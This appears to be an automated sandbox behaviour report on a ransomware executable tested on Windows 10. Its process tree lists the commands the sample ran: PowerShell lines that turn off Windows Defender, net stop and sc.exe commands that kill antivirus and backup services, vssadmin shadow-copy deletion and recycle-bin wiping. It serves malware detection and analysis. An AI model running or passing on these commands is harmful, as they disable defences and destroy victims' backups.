Analysis

  • max time kernel
    382s
  • max time network
    386s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    17-08-2024 21:22

General

  • Target

    c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

  • Size

    87KB

  • MD5

    d6d956267a268c9dcf48445629d2803e

  • SHA1

    cc0feae505dad9c140dd21d1b40b518d8e61b3a4

  • SHA256

    c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850

  • SHA512

    e0791f6eb3116d0590be3af3713c94f787f7ced8e904d4bb8fc0d1341f332053414cb1e9095ae2de041b9e6d6d55cf773bf45ebeb74f27bb95c11a3cc364abee

  • SSDEEP

    1536:OXMLuZQG3KJ3QaIH9shR4fZcvr4C9u3MTIdD9mtthd9JovrgmqhtvM4CoLT6QPbc:gMLuZraJ3a0ehcvv9sM+9mtthd0gmWkr

Malware Config

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Disables service(s) 3 TTPs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 3 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Drops startup file 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Using powershell.exe command.

  • Enumerates connected drives 3 TTPs 16 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Modifies WinLogon 2 TTPs 2 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Interacts with shadow copies 3 TTPs 14 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 3 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
    "C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe"
    1⤵
    • Modifies Windows Defender Real-time Protection settings
    • Drops startup file
    • Modifies WinLogon
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4696
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2400
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:4456
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:2976
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:4916
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:3724
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:1084
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:3240
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:1112
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:2552
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:4292
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:4076
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:2956
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:656
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop avpsus /y
      2⤵
        PID:684
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop avpsus /y
          3⤵
            PID:6760
        • C:\Windows\SYSTEM32\net.exe
          "net.exe" stop McAfeeDLPAgentService /y
          2⤵
            PID:96
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
              3⤵
                PID:6528
            • C:\Windows\SYSTEM32\net.exe
              "net.exe" stop mfewc /y
              2⤵
                PID:2436
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop mfewc /y
                  3⤵
                    PID:6652
                • C:\Windows\SYSTEM32\net.exe
                  "net.exe" stop BMR Boot Service /y
                  2⤵
                    PID:1952
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 stop BMR Boot Service /y
                      3⤵
                        PID:6660
                    • C:\Windows\SYSTEM32\net.exe
                      "net.exe" stop NetBackup BMR MTFTP Service /y
                      2⤵
                        PID:2288
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
                          3⤵
                            PID:6744
                        • C:\Windows\SYSTEM32\net.exe
                          "net.exe" stop DefWatch /y
                          2⤵
                            PID:760
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 stop DefWatch /y
                              3⤵
                                PID:6872
                            • C:\Windows\SYSTEM32\net.exe
                              "net.exe" stop ccEvtMgr /y
                              2⤵
                                PID:4988
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 stop ccEvtMgr /y
                                  3⤵
                                    PID:6912
                                • C:\Windows\SYSTEM32\net.exe
                                  "net.exe" stop ccSetMgr /y
                                  2⤵
                                    PID:1864
                                    • C:\Windows\system32\net1.exe
                                      C:\Windows\system32\net1 stop ccSetMgr /y
                                      3⤵
                                        PID:6900
                                    • C:\Windows\SYSTEM32\net.exe
                                      "net.exe" stop SavRoam /y
                                      2⤵
                                        PID:3460
                                        • C:\Windows\system32\net1.exe
                                          C:\Windows\system32\net1 stop SavRoam /y
                                          3⤵
                                            PID:6328
                                        • C:\Windows\SYSTEM32\net.exe
                                          "net.exe" stop RTVscan /y
                                          2⤵
                                            PID:4004
                                            • C:\Windows\system32\net1.exe
                                              C:\Windows\system32\net1 stop RTVscan /y
                                              3⤵
                                                PID:6544
                                            • C:\Windows\SYSTEM32\net.exe
                                              "net.exe" stop QBFCService /y
                                              2⤵
                                                PID:2416
                                                • C:\Windows\system32\net1.exe
                                                  C:\Windows\system32\net1 stop QBFCService /y
                                                  3⤵
                                                    PID:6320
                                                • C:\Windows\SYSTEM32\net.exe
                                                  "net.exe" stop QBIDPService /y
                                                  2⤵
                                                    PID:3664
                                                    • C:\Windows\system32\net1.exe
                                                      C:\Windows\system32\net1 stop QBIDPService /y
                                                      3⤵
                                                        PID:6468
                                                    • C:\Windows\SYSTEM32\net.exe
                                                      "net.exe" stop Intuit.QuickBooks.FCS /y
                                                      2⤵
                                                        PID:3808
                                                        • C:\Windows\system32\net1.exe
                                                          C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
                                                          3⤵
                                                            PID:6556
                                                        • C:\Windows\SYSTEM32\net.exe
                                                          "net.exe" stop QBCFMonitorService /y
                                                          2⤵
                                                            PID:2924
                                                            • C:\Windows\system32\net1.exe
                                                              C:\Windows\system32\net1 stop QBCFMonitorService /y
                                                              3⤵
                                                                PID:6800
                                                            • C:\Windows\SYSTEM32\net.exe
                                                              "net.exe" stop YooBackup /y
                                                              2⤵
                                                                PID:3804
                                                                • C:\Windows\system32\net1.exe
                                                                  C:\Windows\system32\net1 stop YooBackup /y
                                                                  3⤵
                                                                    PID:6672
                                                                • C:\Windows\SYSTEM32\net.exe
                                                                  "net.exe" stop YooIT /y
                                                                  2⤵
                                                                    PID:1392
                                                                    • C:\Windows\system32\net1.exe
                                                                      C:\Windows\system32\net1 stop YooIT /y
                                                                      3⤵
                                                                        PID:6536
                                                                    • C:\Windows\SYSTEM32\net.exe
                                                                      "net.exe" stop zhudongfangyu /y
                                                                      2⤵
                                                                        PID:4412
                                                                        • C:\Windows\system32\net1.exe
                                                                          C:\Windows\system32\net1 stop zhudongfangyu /y
                                                                          3⤵
                                                                            PID:6852
                                                                        • C:\Windows\SYSTEM32\net.exe
                                                                          "net.exe" stop stc_raw_agent /y
                                                                          2⤵
                                                                            PID:2132
                                                                            • C:\Windows\system32\net1.exe
                                                                              C:\Windows\system32\net1 stop stc_raw_agent /y
                                                                              3⤵
                                                                                PID:6644
                                                                            • C:\Windows\SYSTEM32\net.exe
                                                                              "net.exe" stop VSNAPVSS /y
                                                                              2⤵
                                                                                PID:4044
                                                                                • C:\Windows\system32\net1.exe
                                                                                  C:\Windows\system32\net1 stop VSNAPVSS /y
                                                                                  3⤵
                                                                                    PID:6628
                                                                                • C:\Windows\SYSTEM32\net.exe
                                                                                  "net.exe" stop VeeamTransportSvc /y
                                                                                  2⤵
                                                                                    PID:1456
                                                                                    • C:\Windows\system32\net1.exe
                                                                                      C:\Windows\system32\net1 stop VeeamTransportSvc /y
                                                                                      3⤵
                                                                                        PID:6948
                                                                                    • C:\Windows\SYSTEM32\net.exe
                                                                                      "net.exe" stop VeeamDeploymentService /y
                                                                                      2⤵
                                                                                        PID:3436
                                                                                        • C:\Windows\system32\net1.exe
                                                                                          C:\Windows\system32\net1 stop VeeamDeploymentService /y
                                                                                          3⤵
                                                                                            PID:7128
                                                                                        • C:\Windows\SYSTEM32\net.exe
                                                                                          "net.exe" stop VeeamNFSSvc /y
                                                                                          2⤵
                                                                                            PID:1288
                                                                                            • C:\Windows\system32\net1.exe
                                                                                              C:\Windows\system32\net1 stop VeeamNFSSvc /y
                                                                                              3⤵
                                                                                                PID:6752
                                                                                            • C:\Windows\SYSTEM32\net.exe
                                                                                              "net.exe" stop veeam /y
                                                                                              2⤵
                                                                                                PID:2600
                                                                                                • C:\Windows\system32\net1.exe
                                                                                                  C:\Windows\system32\net1 stop veeam /y
                                                                                                  3⤵
                                                                                                    PID:6964
                                                                                                • C:\Windows\SYSTEM32\net.exe
                                                                                                  "net.exe" stop PDVFSService /y
                                                                                                  2⤵
                                                                                                    PID:1284
                                                                                                    • C:\Windows\system32\net1.exe
                                                                                                      C:\Windows\system32\net1 stop PDVFSService /y
                                                                                                      3⤵
                                                                                                        PID:6792
                                                                                                    • C:\Windows\SYSTEM32\net.exe
                                                                                                      "net.exe" stop BackupExecVSSProvider /y
                                                                                                      2⤵
                                                                                                        PID:1420
                                                                                                        • C:\Windows\system32\net1.exe
                                                                                                          C:\Windows\system32\net1 stop BackupExecVSSProvider /y
                                                                                                          3⤵
                                                                                                            PID:6920
                                                                                                        • C:\Windows\SYSTEM32\net.exe
                                                                                                          "net.exe" stop BackupExecAgentAccelerator /y
                                                                                                          2⤵
                                                                                                            PID:2456
                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                              C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
                                                                                                              3⤵
                                                                                                                PID:6620
                                                                                                            • C:\Windows\SYSTEM32\net.exe
                                                                                                              "net.exe" stop BackupExecAgentBrowser /y
                                                                                                              2⤵
                                                                                                                PID:2448
                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                  C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
                                                                                                                  3⤵
                                                                                                                    PID:6892
                                                                                                                • C:\Windows\SYSTEM32\net.exe
                                                                                                                  "net.exe" stop BackupExecDiveciMediaService /y
                                                                                                                  2⤵
                                                                                                                    PID:952
                                                                                                                    • C:\Windows\system32\net1.exe
                                                                                                                      C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
                                                                                                                      3⤵
                                                                                                                        PID:6840
                                                                                                                    • C:\Windows\SYSTEM32\net.exe
                                                                                                                      "net.exe" stop BackupExecJobEngine /y
                                                                                                                      2⤵
                                                                                                                        PID:2588
                                                                                                                        • C:\Windows\system32\net1.exe
                                                                                                                          C:\Windows\system32\net1 stop BackupExecJobEngine /y
                                                                                                                          3⤵
                                                                                                                            PID:6488
                                                                                                                        • C:\Windows\SYSTEM32\net.exe
                                                                                                                          "net.exe" stop BackupExecManagementService /y
                                                                                                                          2⤵
                                                                                                                            PID:4632
                                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                                              C:\Windows\system32\net1 stop BackupExecManagementService /y
                                                                                                                              3⤵
                                                                                                                                PID:6736
                                                                                                                            • C:\Windows\SYSTEM32\net.exe
                                                                                                                              "net.exe" stop BackupExecRPCService /y
                                                                                                                              2⤵
                                                                                                                                PID:3680
                                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                                  C:\Windows\system32\net1 stop BackupExecRPCService /y
                                                                                                                                  3⤵
                                                                                                                                    PID:6520
                                                                                                                                • C:\Windows\SYSTEM32\net.exe
                                                                                                                                  "net.exe" stop AcrSch2Svc /y
                                                                                                                                  2⤵
                                                                                                                                    PID:3068
                                                                                                                                    • C:\Windows\system32\net1.exe
                                                                                                                                      C:\Windows\system32\net1 stop AcrSch2Svc /y
                                                                                                                                      3⤵
                                                                                                                                        PID:6784
                                                                                                                                    • C:\Windows\SYSTEM32\net.exe
                                                                                                                                      "net.exe" stop AcronisAgent /y
                                                                                                                                      2⤵
                                                                                                                                        PID:2252
                                                                                                                                        • C:\Windows\system32\net1.exe
                                                                                                                                          C:\Windows\system32\net1 stop AcronisAgent /y
                                                                                                                                          3⤵
                                                                                                                                            PID:6956
                                                                                                                                        • C:\Windows\SYSTEM32\net.exe
                                                                                                                                          "net.exe" stop CASAD2DWebSvc /y
                                                                                                                                          2⤵
                                                                                                                                            PID:2472
                                                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                                                              C:\Windows\system32\net1 stop CASAD2DWebSvc /y
                                                                                                                                              3⤵
                                                                                                                                                PID:6636
                                                                                                                                            • C:\Windows\SYSTEM32\net.exe
                                                                                                                                              "net.exe" stop CAARCUpdateSvc /y
                                                                                                                                              2⤵
                                                                                                                                                PID:280
                                                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                                                  C:\Windows\system32\net1 stop CAARCUpdateSvc /y
                                                                                                                                                  3⤵
                                                                                                                                                    PID:6972
                                                                                                                                                • C:\Windows\SYSTEM32\net.exe
                                                                                                                                                  "net.exe" stop sophos /y
                                                                                                                                                  2⤵
                                                                                                                                                    PID:384
                                                                                                                                                    • C:\Windows\system32\net1.exe
                                                                                                                                                      C:\Windows\system32\net1 stop sophos /y
                                                                                                                                                      3⤵
                                                                                                                                                        PID:6824
                                                                                                                                                    • C:\Windows\SYSTEM32\sc.exe
                                                                                                                                                      "sc.exe" config SQLTELEMETRY start= disabled
                                                                                                                                                      2⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:164
                                                                                                                                                    • C:\Windows\SYSTEM32\sc.exe
                                                                                                                                                      "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                                                                                                                                                      2⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:1524
                                                                                                                                                    • C:\Windows\SYSTEM32\sc.exe
                                                                                                                                                      "sc.exe" config SQLWriter start= disabled
                                                                                                                                                      2⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:4484
                                                                                                                                                    • C:\Windows\SYSTEM32\sc.exe
                                                                                                                                                      "sc.exe" config SstpSvc start= disabled
                                                                                                                                                      2⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:4876
                                                                                                                                                    • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                                      "taskkill.exe" /IM mspub.exe /F
                                                                                                                                                      2⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:3832
                                                                                                                                                    • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                                      "taskkill.exe" /IM mydesktopqos.exe /F
                                                                                                                                                      2⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:2748
                                                                                                                                                    • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                                      "taskkill.exe" /IM mydesktopservice.exe /F
                                                                                                                                                      2⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:2648
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" Delete Shadows /all /quiet
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:2500
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:1296
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:3244
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:3936
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:4264
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:4936
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:2100
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:3124
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:2096
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:4400
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:4992
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:1752
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:2412
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" Delete Shadows /all /quiet
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:1060
                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                      "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
                                                                                                                                                      2⤵
                                                                                                                                                        PID:3524
                                                                                                                                                      • C:\Windows\System32\mshta.exe
                                                                                                                                                        "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
                                                                                                                                                        2⤵
                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                        PID:7820
                                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                        "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                                                                                                                                                        2⤵
                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                        PID:7896
                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                          ping 127.0.0.7 -n 3
                                                                                                                                                          3⤵
                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                          • Runs ping.exe
                                                                                                                                                          PID:8004
                                                                                                                                                        • C:\Windows\system32\fsutil.exe
                                                                                                                                                          fsutil file setZeroData offset=0 length=524288 “%s”
                                                                                                                                                          3⤵
                                                                                                                                                            PID:6928
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                          2⤵
                                                                                                                                                            PID:7932
                                                                                                                                                            • C:\Windows\system32\choice.exe
                                                                                                                                                              choice /C Y /N /D Y /T 3
                                                                                                                                                              3⤵
                                                                                                                                                                PID:7996
                                                                                                                                                          • C:\Windows\system32\vssvc.exe
                                                                                                                                                            C:\Windows\system32\vssvc.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:7860

                                                                                                                                                            Network

                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                            Replay Monitor

                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                            Downloads

                                                                                                                                                            • C:\HOW_TO_DECYPHER_FILES.txt

                                                                                                                                                              Filesize

                                                                                                                                                              446B

                                                                                                                                                              MD5

                                                                                                                                                              22d12f0c62404d0273dddcf1bb22b9c0

                                                                                                                                                              SHA1

                                                                                                                                                              02565b16008ed0838a23dbad78fe1a277f6af9db

                                                                                                                                                              SHA256

                                                                                                                                                              d66128050167df4728e1d6466984eac78966f35d85b529cdbe035bc0147d4d65

                                                                                                                                                              SHA512

                                                                                                                                                              146c0ebed21f17f2b2e47b03088f5fa404402b4b7313bae4288e82821fc0c42dbd127d9fabacfca9db6f44ef82f73cf989d885032cb21b2cae6fdcd5ed54189d

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                              Filesize

                                                                                                                                                              3KB

                                                                                                                                                              MD5

                                                                                                                                                              ad5cd538ca58cb28ede39c108acb5785

                                                                                                                                                              SHA1

                                                                                                                                                              1ae910026f3dbe90ed025e9e96ead2b5399be877

                                                                                                                                                              SHA256

                                                                                                                                                              c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

                                                                                                                                                              SHA512

                                                                                                                                                              c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              97219d227675814313a35fdd9318715c

                                                                                                                                                              SHA1

                                                                                                                                                              ac157e76a6d8b1fe2fbe2cf29df07a078dc9a78b

                                                                                                                                                              SHA256

                                                                                                                                                              e2945f6a712bcfd6a1540ea88ebd1a0caa519e9f0507efefa7d9145ee4ccca38

                                                                                                                                                              SHA512

                                                                                                                                                              0490ef40ccef4e4d67a0acbcdd5e46d8433488f4a17fc97152e53910809e5a30522f2854c77a4001deaab16c3b8456795899fc53b67032953c90f27840651dc4

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              1c1ed18487a825ab55260bf1a189c0c4

                                                                                                                                                              SHA1

                                                                                                                                                              a192921d3581650aa8a21e923b41a51d3168daaa

                                                                                                                                                              SHA256

                                                                                                                                                              f437485cf55646fb59e25397389cc0c7920f05273a322273efc4fc26803f5d0c

                                                                                                                                                              SHA512

                                                                                                                                                              c3480e25ab1e4b23ef02407772856b482bf84a5651d6ef11cafaf6536de1b81419f004047b2a8cf13c6163bcaea37ca1a01e72b3b3c2db22016f048a51ba2fbc

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              b1afc42ca4cd5c314043cd9b36dbf1ad

                                                                                                                                                              SHA1

                                                                                                                                                              0a8f1669febe32e1061555826b2c8cf0c298206a

                                                                                                                                                              SHA256

                                                                                                                                                              87851afe75b4fa69f9760a5e5316c689aec20ea30f24eab5335ebb45a2348743

                                                                                                                                                              SHA512

                                                                                                                                                              03e13f5b2739d69b3f313c456be6a140783c7d4ad447e5836c2b4dd32c0712137a47b864c6f42e5d5712648aa15854f39de48758a00b0e620b7e693b1b9f3cd2

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              39347cf997061df7c8eadba19d182463

                                                                                                                                                              SHA1

                                                                                                                                                              12aaa94d7d200bd194b6833c1128e2f0a69134fa

                                                                                                                                                              SHA256

